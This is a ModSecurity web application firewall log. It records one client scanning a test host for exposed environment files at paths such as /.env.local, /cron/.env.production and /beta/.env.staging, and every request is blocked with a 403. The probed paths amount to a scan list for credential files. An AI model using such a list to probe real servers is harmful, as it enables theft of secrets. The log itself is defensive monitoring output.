[Sat Mar 21 04:10:42.300979 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwIgAAAAQ"]
[Sat Mar 21 04:10:42.595372 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwIwAAAAQ"]
[Sat Mar 21 04:10:42.595527 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwIwAAAAQ"]
[Sat Mar 21 04:10:42.595668 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwIwAAAAQ"]
[Sat Mar 21 04:10:42.889905 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwJAAAAAQ"]
[Sat Mar 21 04:10:42.890075 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwJAAAAAQ"]
[Sat Mar 21 04:10:42.890228 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwJAAAAAQ"]
[Sat Mar 21 04:10:43.184646 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /front/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/front/.env"] [unique_id "ab4MMycEfGZAHyIZnYBwJQAAAAQ"]
[Sat Mar 21 04:10:43.184800 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/front/.env"] [unique_id "ab4MMycEfGZAHyIZnYBwJQAAAAQ"]
[Sat Mar 21 04:10:43.184952 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/front/.env"] [unique_id "ab4MMycEfGZAHyIZnYBwJQAAAAQ"]
[Sat Mar 21 04:10:43.479448 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "ab4MMycEfGZAHyIZnYBwJgAAAAQ"]
[Sat Mar 21 04:10:43.479629 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "ab4MMycEfGZAHyIZnYBwJgAAAAQ"]
[Sat Mar 21 04:10:43.479761 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env"] [unique_id "ab4MMycEfGZAHyIZnYBwJgAAAAQ"]
[Sat Mar 21 04:10:43.774109 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.production"] [unique_id "ab4MMycEfGZAHyIZnYBwJwAAAAQ"]
[Sat Mar 21 04:10:43.774268 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.production"] [unique_id "ab4MMycEfGZAHyIZnYBwJwAAAAQ"]
[Sat Mar 21 04:10:43.774438 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.production"] [unique_id "ab4MMycEfGZAHyIZnYBwJwAAAAQ"]
[Sat Mar 21 04:10:44.068726 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab4MNCcEfGZAHyIZnYBwKAAAAAQ"]
[Sat Mar 21 04:10:44.068890 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab4MNCcEfGZAHyIZnYBwKAAAAAQ"]
[Sat Mar 21 04:10:44.069043 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "ab4MNCcEfGZAHyIZnYBwKAAAAAQ"]
[Sat Mar 21 04:10:44.363434 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKQAAAAQ"]
[Sat Mar 21 04:10:44.363590 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKQAAAAQ"]
[Sat Mar 21 04:10:44.363725 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKQAAAAQ"]
[Sat Mar 21 04:10:44.658129 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKgAAAAQ"]
[Sat Mar 21 04:10:44.658288 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKgAAAAQ"]
[Sat Mar 21 04:10:44.658480 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKgAAAAQ"]
[Sat Mar 21 04:10:44.952782 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/BACKEND/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKwAAAAQ"]
[Sat Mar 21 04:10:44.952944 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/BACKEND/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKwAAAAQ"]
[Sat Mar 21 04:10:44.953095 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/BACKEND/.env"] [unique_id "ab4MNCcEfGZAHyIZnYBwKwAAAAQ"]
[Sat Mar 21 04:10:45.247501 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.local"] [unique_id "ab4MNScEfGZAHyIZnYBwLAAAAAQ"]
[Sat Mar 21 04:10:45.247659 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.local"] [unique_id "ab4MNScEfGZAHyIZnYBwLAAAAAQ"]
[Sat Mar 21 04:10:45.247809 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.local"] [unique_id "ab4MNScEfGZAHyIZnYBwLAAAAAQ"]
[Sat Mar 21 04:10:45.542070 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.staging"] [unique_id "ab4MNScEfGZAHyIZnYBwLQAAAAQ"]
[Sat Mar 21 04:10:45.542229 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.staging"] [unique_id "ab4MNScEfGZAHyIZnYBwLQAAAAQ"]
[Sat Mar 21 04:10:45.542402 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.staging"] [unique_id "ab4MNScEfGZAHyIZnYBwLQAAAAQ"]
[Sat Mar 21 04:10:45.916681 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.staging"] [unique_id "ab4MNScEfGZAHyIZnYBwLgAAAAQ"]
[Sat Mar 21 04:10:45.916838 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.staging"] [unique_id "ab4MNScEfGZAHyIZnYBwLgAAAAQ"]
[Sat Mar 21 04:10:45.916980 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.staging"] [unique_id "ab4MNScEfGZAHyIZnYBwLgAAAAQ"]
[Sat Mar 21 04:10:46.243205 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /media/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/media/.env"] [unique_id "ab4MNicEfGZAHyIZnYBwLwAAAAQ"]
[Sat Mar 21 04:10:46.243370 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/media/.env"] [unique_id "ab4MNicEfGZAHyIZnYBwLwAAAAQ"]
[Sat Mar 21 04:10:46.243513 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/media/.env"] [unique_id "ab4MNicEfGZAHyIZnYBwLwAAAAQ"]
